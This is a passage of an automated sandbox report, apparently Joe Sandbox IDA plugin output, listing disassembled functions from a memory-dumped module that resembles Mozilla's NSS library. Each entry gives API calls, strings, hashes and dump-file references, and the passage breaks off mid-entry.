Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CondNotifyValue$CriticalEnterSectionUnlock
String ID:
API String ID: 1007705821-0
Opcode ID: 852fc6fa58712d9c883e08a5a5818a6a7dd228c140749ffdfdb1a0b45d797218
Instruction ID: 71d4afdc37c1fc5ce07d18500f8cfbe83bc4d8a50bfb8aea2b216c3107a1aeff
Opcode Fuzzy Hash: 852fc6fa58712d9c883e08a5a5818a6a7dd228c140749ffdfdb1a0b45d797218
Instruction Fuzzy Hash: B1215CB46047088FDB20AF39C144659B7F4FB05348F1A5A6AD89587A51E734F4C8CBD1

Function 6CAD4820 Relevance: 9.1, APIs: 6, Instructions: 74stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6CAD4EB8,?), ref: 6CAD4884

Part of subcall function 6CAD8800: TlsGetValue.KERNEL32(?,6CAE085A,00000000,?,6CA88369,?), ref: 6CAD8821
Part of subcall function 6CAD8800: TlsGetValue.KERNEL32(?,?,6CAE085A,00000000,?,6CA88369,?), ref: 6CAD883D
Part of subcall function 6CAD8800: EnterCriticalSection.KERNEL32(?,?,?,6CAE085A,00000000,?,6CA88369,?), ref: 6CAD8856
Part of subcall function 6CAD8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CAD8887
Part of subcall function 6CAD8800: PR_Unlock.NSS3(?,?,?,?,6CAE085A,00000000,?,6CA88369,?), ref: 6CAD8899

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CAD4EB8,?,?,?,?,?,?,?,?,?,?,6CA978F8), ref: 6CAD484C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CAD4EB8,?,?,?,?,?,?,?,?,?,?,6CA978F8), ref: 6CAD486D
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CA978F8), ref: 6CAD4899
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD48A9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD48B8

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockstrcmp$CondErrorWait
String ID:
API String ID: 2226052791-0
Opcode ID: c62b44459a546aace6860205b206b07a71753afeba15b192efad553692b7f015
Instruction ID: 63f046ed03b61db4670d4a070d0ab6cf97de7ca8b2b3e54b9956c5f80be2f4c4
Opcode Fuzzy Hash: c62b44459a546aace6860205b206b07a71753afeba15b192efad553692b7f015
Instruction Fuzzy Hash: 4C21A7B6B006809BEF105F65ED8855E77B8BF0A7D97190524DA0947A02EB21F8D887E2

Function 6CA989E0 Relevance: 9.1, APIs: 6, Instructions: 64COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CA988AE,-00000008), ref: 6CA98A04
EnterCriticalSection.KERNEL32(?), ref: 6CA98A15
memset.VCRUNTIME140(6CA988AE,00000000,00000132), ref: 6CA98A27
PR_Unlock.NSS3(?), ref: 6CA98A35
memset.VCRUNTIME140(6CA988AE,00000000,00000132,00000000,-00000008,00000000,?,?,6CA988AE,-00000008), ref: 6CA98A45
free.MOZGLUE(6CA988A6,?,6CA988AE,-00000008), ref: 6CA98A4E

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: memset$CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 65992600-0
Opcode ID: 25ee32ad5ac457d351099ecf752b82214cfe3f874038af0d5dffe31f24ad32da
Instruction ID: 72a822524282048f9d726c1ea845e6deb47f03903df68fc1a887f76e1eea94f3
Opcode Fuzzy Hash: 25ee32ad5ac457d351099ecf752b82214cfe3f874038af0d5dffe31f24ad32da
Instruction Fuzzy Hash: 741108B5E00304AFEF009F68DC86A6EFBB8FF05754F050522E91897A01E731E59487E1

Function 6CA98A90 Relevance: 9.1, APIs: 6, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 6CA98FE0: PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6CAA0710), ref: 6CA98FF1
Part of subcall function 6CA98FE0: calloc.MOZGLUE(00000001,00000000,?,?,6CAA0710), ref: 6CA9904D
Part of subcall function 6CA98FE0: memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6CAA0710), ref: 6CA99066
Part of subcall function 6CA98FE0: PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6CAA0710), ref: 6CA99078

TlsGetValue.KERNEL32 ref: 6CA98AC1
EnterCriticalSection.KERNEL32 ref: 6CA98AD6
PL_FinishArenaPool.NSS3 ref: 6CA98AE5
PR_Unlock.NSS3 ref: 6CA98AF7
DeleteCriticalSection.KERNEL32 ref: 6CA98B02
free.MOZGLUE ref: 6CA98B0E

Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707AD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707CD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707D6
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA0204A), ref: 6CA707E4
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,6CA0204A), ref: 6CA70864
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA70880
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,6CA0204A), ref: 6CA708CB
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708D7
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708FB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$calloc$CriticalPrivateSectionThread$ArenaDeleteEnterFinishPoolUnlockfreememcpy
String ID:
API String ID: 417085867-0
Opcode ID: 05edc2ef568232942e33f199a839e4671860016bf51700a90307a2861c4f0312
Instruction ID: 8a045f8db9a6cb171feae9b668b0326b3f2057f838345e09e087e4263d687e5c
Opcode Fuzzy Hash: 05edc2ef568232942e33f199a839e4671860016bf51700a90307a2861c4f0312
Instruction Fuzzy Hash: 57113AB1514A058FEB00BF78D18A66ABBF4FF05348F05496AD98587701EB34E4D9CBD2

Function 6CB98910 Relevance: 9.1, APIs: 6, Instructions: 55threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6CB9892E

Part of subcall function 6CA70F00: PR_GetPageSize.NSS3(6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F1B
Part of subcall function 6CA70F00: PR_NewLogModule.NSS3(clock,6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F25

PR_Lock.NSS3 ref: 6CB98950

Part of subcall function 6CB49BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CA71A48), ref: 6CB49BB3
Part of subcall function 6CB49BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CA71A48), ref: 6CB49BC8

getprotobynumber.WSOCK32(?), ref: 6CB98959
GetLastError.KERNEL32(?), ref: 6CB98967
PR_GetCurrentThread.NSS3(?,?), ref: 6CB9896F
PR_Unlock.NSS3(?,?), ref: 6CB9898A

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CurrentThread$CriticalEnterErrorLastLockModulePageSectionSizeUnlockValuegetprotobynumber
String ID:
API String ID: 4143355744-0
Opcode ID: 10d5dc1e20b2a2684c68db90747978a1e40eb5d500467cf48b4339a735fffd15
Instruction ID: 7ecb4d1458a0ffe1669f3212dfd098ea0fb67d1117285048117ecccf70b1cb0c
Opcode Fuzzy Hash: 10d5dc1e20b2a2684c68db90747978a1e40eb5d500467cf48b4339a735fffd15
Instruction Fuzzy Hash: 4A110672E140A09BCB009FB9980054E3768EF46778F094376DC09977A1C7318C04C7C6

Function 6CA98B50 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6CAA0948,00000000), ref: 6CA98B6B
EnterCriticalSection.KERNEL32(?,?,?,6CAA0948,00000000), ref: 6CA98B80
PL_FinishArenaPool.NSS3(?,?,?,?,6CAA0948,00000000), ref: 6CA98B8F
PR_Unlock.NSS3(?,?,?,?,6CAA0948,00000000), ref: 6CA98BA1
DeleteCriticalSection.KERNEL32(?,?,?,?,6CAA0948,00000000), ref: 6CA98BAC
free.MOZGLUE(?,?,?,?,?,6CAA0948,00000000), ref: 6CA98BB8

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalSection$ArenaDeleteEnterFinishPoolUnlockValuefree
String ID:
API String ID: 1456478736-0
Opcode ID: a471367c301ff38ee2bcc72ee5022fbc4464453fcfc0b88c2c0ede72e733e82a
Instruction ID: 6ad058c67c339d134b207ebb23cf3c3add13b75d83ed3027c61fc9500eb5f26e
Opcode Fuzzy Hash: a471367c301ff38ee2bcc72ee5022fbc4464453fcfc0b88c2c0ede72e733e82a
Instruction Fuzzy Hash: B6118CB1604A048FDB00BFB8C18916EBBF4FF05254F05492AD88487701EB34E4D9CBD2

Function 6CA6C4E0 Relevance: 9.1, APIs: 6, Instructions: 52COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA6C4F0
free.MOZGLUE ref: 6CA6C51A
TlsSetValue.KERNEL32 ref: 6CA6C540
free.MOZGLUE ref: 6CA6C557
DeleteCriticalSection.KERNEL32 ref: 6CA6C56A
free.MOZGLUE ref: 6CA6C576

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: free$Value$CriticalDeleteSection
String ID:
API String ID: 195087141-0
Opcode ID: c15d12d40605b0959552c3bca86d5065e38b7acdb6703db18fa8f2a5e80f7158
Instruction ID: dc863934fd0f5709322a836a01501212d843803dfc66cbebbab1bccbe9b7206a
Opcode Fuzzy Hash: c15d12d40605b0959552c3bca86d5065e38b7acdb6703db18fa8f2a5e80f7158
Instruction Fuzzy Hash: 7C1130B4604B508BCB10BF7AC54855EBFF4FF45749F454A2DD8DA87A01EB34A098CB82

Function 6CA9AB10 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(D958E852,6CAA1397,5B5F5EC0,?,?,6CA9B1EE,2404110F,?,?), ref: 6CA9AB3C
free.MOZGLUE(D958E836,?,6CA9B1EE,2404110F,?,?), ref: 6CA9AB49
DeleteCriticalSection.KERNEL32(5D5E6CC9), ref: 6CA9AB5C
free.MOZGLUE(5D5E6CBD), ref: 6CA9AB63
DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6CA9AB6F
free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6CA9AB76

Part of subcall function 6CACF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CACF854
Part of subcall function 6CACF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CACF868
Part of subcall function 6CACF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CACF882
Part of subcall function 6CACF820: free.MOZGLUE(04C483FF,?,?), ref: 6CACF889
Part of subcall function 6CACF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CACF8A4
Part of subcall function 6CACF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CACF8AB
Part of subcall function 6CACF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CACF8C9
Part of subcall function 6CACF820: free.MOZGLUE(280F10EC,?,?), ref: 6CACF8D0

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 1aea23a5cd9496c96ba7456a0c85e1b17512439794d742196fe7f14c12bbfe63
Instruction ID: 9b0641a1666145f017e75e3fbf2eca2403b2c06796904404cfd683eb91c4d43e
Opcode Fuzzy Hash: 1aea23a5cd9496c96ba7456a0c85e1b17512439794d742196fe7f14c12bbfe63
Instruction Fuzzy Hash: B60188B2A00605AFDA01DFA4DC85C5B73BDFF467397080626E91987A00D736F896D7E1

Function 6CB16840 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

PR_NewMonitor.NSS3(00000000,?,6CB1AA9B,?,?,?,?,?,?,?,00000000,?,6CB180C1), ref: 6CB16846

Part of subcall function 6CA71770: calloc.MOZGLUE(00000001,0000019C,?,6CA715C2,?,?,?,?,?,00000001,00000040), ref: 6CA7178D

PR_NewMonitor.NSS3(00000000,?,6CB1AA9B,?,?,?,?,?,?,?,00000000,?,6CB180C1), ref: 6CB16855

Part of subcall function 6CAD8680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6CA855D0,00000000,00000000), ref: 6CAD868B
Part of subcall function 6CAD8680: PR_NewLock.NSS3(00000000,00000000), ref: 6CAD86A0
Part of subcall function 6CAD8680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6CAD86B2
Part of subcall function 6CAD8680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6CAD86C8
Part of subcall function 6CAD8680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6CAD86E2
Part of subcall function 6CAD8680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6CAD86EC
Part of subcall function 6CAD8680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6CAD8700

PR_NewMonitor.NSS3(?,6CB1AA9B,?,?,?,?,?,?,?,00000000,?,6CB180C1), ref: 6CB1687D

Part of subcall function 6CA71770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6CA718DE
Part of subcall function 6CA71770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6CA718F1

PR_NewMonitor.NSS3(?,6CB1AA9B,?,?,?,?,?,?,?,00000000,?,6CB180C1), ref: 6CB1688C

Part of subcall function 6CA71770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6CA718FC
Part of subcall function 6CA71770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6CA7198A

PR_NewLock.NSS3 ref: 6CB168A5

Part of subcall function 6CB498D0: calloc.MOZGLUE(00000001,00000084,6CA70936,00000001,?,6CA7102C), ref: 6CB498E5

PR_NewLock.NSS3 ref: 6CB168B4

Part of subcall function 6CB498D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CB49946
Part of subcall function 6CB498D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA016B7,00000000), ref: 6CB4994E
Part of subcall function 6CB498D0: free.MOZGLUE(00000000), ref: 6CB4995E

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
String ID:
API String ID: 200661885-0
Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction ID: f5e478ec9668dbf54fc0636de109f8ca61d0392cdc55b727384249cf6391976c
Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction Fuzzy Hash: BB01FBB4A09B4746E7616B754D203FB77E8EF0168AF10053A8569C6E80FF61D44C8BB2

Function 6CA6AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA6AFDA

Strings

misuse, xrefs: 6CA6AFCE
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA6AFC4
unable to delete/modify collation sequence due to active statements, xrefs: 6CA6AF5C
%s at line %d of [%.10s], xrefs: 6CA6AFD3

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 487a81d653f474ef8a131ccccba89eacc5e603173b39642128c34ca9f3e8a5e2
Instruction ID: 6004805554fc220a08010eccdac5220da6ab9702e0147111a3fc404924f6d9c5
Opcode Fuzzy Hash: 487a81d653f474ef8a131ccccba89eacc5e603173b39642128c34ca9f3e8a5e2
Instruction Fuzzy Hash: 5091E475A012258FDB04CF5AC850BAABBF2BF49314F1D45A8E865ABB51C334ED41CB60

Function 6CA0E4C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108D2,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA0E53A
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108BD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA0E5BC

Strings

database corruption, xrefs: 6CA0E52F, 6CA0E5B1
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA0E525, 6CA0E596, 6CA0E5A7
%s at line %d of [%.10s], xrefs: 6CA0E534, 6CA0E5B6

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 45078c28c503531af9a4153dbd2d91c8246f7cf70387b6bb23c769323eff9ec0
Instruction ID: cce771671d6743fca657ad035ffb8dd0b7ea9eef187a8baed241f6b7321c6ba1
Opcode Fuzzy Hash: 45078c28c503531af9a4153dbd2d91c8246f7cf70387b6bb23c769323eff9ec0
Instruction Fuzzy Hash: F03158357007155BC7118EADD89097AB3A0EB41368B580D7CE888A7B81F371F889C3D0

Function 6CA94B00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6CA94B66
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6CA94B7D
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6CA94B97
PORT_ZAlloc_Util.NSS3(00000018), ref: 6CA94BB7

Part of subcall function 6CAE0D30: calloc.MOZGLUE ref: 6CAE0D50
Part of subcall function 6CAE0D30: TlsGetValue.KERNEL32 ref: 6CAE0D6D

Strings

, xrefs: 6CA94B8A

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: AlgorithmPolicy$Alloc_ErrorUtilValuecalloc
String ID:
API String ID: 4087055539-3916222277
Opcode ID: bc341fe690301c19299bf0edbff2458a611d37af10f031e2184309ed68d11648
Instruction ID: be4ae167e0b5c25ed644d8656bf3f477b4856b5bd71728395ad016dd9afec392
Opcode Fuzzy Hash: bc341fe690301c19299bf0edbff2458a611d37af10f031e2184309ed68d11648
Instruction Fuzzy Hash: C3214D71D102495BDF108A65DC43BBFB7F49F4631CF180225F53996AC1E7209598C7E2

Function 6CB5A800 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6CA27915,?,?), ref: 6CB5A86D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6CA27915,?,?), ref: 6CB5A8A6

Strings

database corruption, xrefs: 6CB5A89B
